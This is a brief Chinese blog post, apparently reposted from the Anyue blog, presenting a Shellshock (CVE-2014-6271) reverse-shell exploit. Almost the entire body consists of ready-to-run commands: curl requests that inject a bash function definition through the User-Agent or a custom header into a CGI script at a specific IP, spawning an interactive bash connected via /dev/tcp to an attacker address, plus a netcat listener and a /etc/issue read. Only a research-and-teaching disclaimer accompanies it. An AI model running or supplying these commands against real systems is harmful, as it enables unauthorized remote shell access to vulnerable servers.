CVE-2014-6271反弹shell

暗月博客 2019年11月21日20:38:56评论439 views字数 192阅读0分38秒阅读模式
摘要

curl -A "() { :;}; /bin/bash -i >& /dev/tcp/61.51.xx.xx/8080 0>&1" http://23.239.208.105/cgi-bin/poc.cgi

//直接反弹语句:

curl -A "() { :;}; /bin/bash -i >& /dev/tcp/61.51.xx.xx/8080 0>&1" http://23.239.208.105/cgi-bin/poc.cgi

nc -lvvp 8080  //本地监听8080端口

curl -H "X: () { :;}; /bin/cat /etc/issue" http://xxx.jp/cgi-bin/xxx.pl

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日20:38:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2014-6271反弹shellhttps://cn-sec.com/archives/71904.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息